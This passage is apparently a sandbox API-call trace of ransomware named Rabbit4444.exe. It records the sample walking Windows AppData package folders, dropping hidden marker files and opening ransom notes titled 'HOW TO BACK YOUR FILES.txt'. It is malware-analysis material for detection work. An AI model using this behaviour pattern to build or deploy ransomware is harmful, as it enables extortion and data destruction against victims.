(lpBaseAddress=0x70000) returned 1 [0060.679] CloseHandle (hObject=0x2a0) returned 1 [0060.679] CloseHandle (hObject=0x27c) returned 1 [0060.679] GetCurrentThreadId () returned 0xd98 [0060.679] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0060.679] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache" [0060.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123820 | out: hHeap=0xe0000) returned 1 [0060.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0060.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache" [0060.679] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\" [0060.680] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0060.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.681] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.684] FlushFileBuffers (hFile=0x27c) returned 1 [0060.685] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.685] CloseHandle (hObject=0x27c) returned 1 [0060.685] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache") returned 93 [0060.686] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.686] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8b2eb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0060.686] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.686] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.686] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.686] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.686] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8b2eb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.686] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.686] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.686] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.686] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.686] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.686] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed7df44e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed7df44e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.686] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.686] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed7df44e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed7df44e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.686] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0060.686] lstrcpyW (in: lpString1=0x130ebf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.687] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.687] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.687] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.687] CloseHandle (hObject=0x2a0) returned 1 [0060.687] CloseHandle (hObject=0x27c) returned 1 [0060.687] GetCurrentThreadId () returned 0xd98 [0060.687] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0060.687] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData" [0060.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.687] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0060.688] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData" [0060.688] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\" [0060.688] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" [0060.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.689] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.691] FlushFileBuffers (hFile=0x27c) returned 1 [0060.693] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.693] CloseHandle (hObject=0x27c) returned 1 [0060.693] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData") returned 90 [0060.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8acf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0060.693] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.694] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.694] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.694] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.694] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8acf2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed7df44e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.694] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.694] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.694] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.694] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.694] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.694] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed7df44e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed7df44e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.694] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.694] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.694] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed7df44e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed7df44e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.694] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0060.694] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.695] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.695] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.695] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.695] CloseHandle (hObject=0x2a0) returned 1 [0060.695] CloseHandle (hObject=0x27c) returned 1 [0060.695] GetCurrentThreadId () returned 0xd98 [0060.695] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0060.696] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC" [0060.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123e00 | out: hHeap=0xe0000) returned 1 [0060.696] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0060.696] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC" [0060.696] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\" [0060.696] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0060.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.697] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.699] FlushFileBuffers (hFile=0x27c) returned 1 [0060.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.700] CloseHandle (hObject=0x27c) returned 1 [0060.702] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC") returned 85 [0060.702] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8a6d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0060.702] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.702] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.702] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.702] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.702] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2a8a6d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.702] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.702] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.702] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.702] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.702] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.702] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed8057d4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed8057d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.702] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.702] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.702] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed8057d4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed8057d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed8057d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.702] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0060.703] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.703] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.704] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.704] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.704] CloseHandle (hObject=0x2a0) returned 1 [0060.704] CloseHandle (hObject=0x27c) returned 1 [0060.704] GetCurrentThreadId () returned 0xd98 [0060.704] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0060.704] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy" [0060.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113698 | out: hHeap=0xe0000) returned 1 [0060.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0060.704] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy" [0060.704] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\" [0060.704] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0060.704] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.731] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: 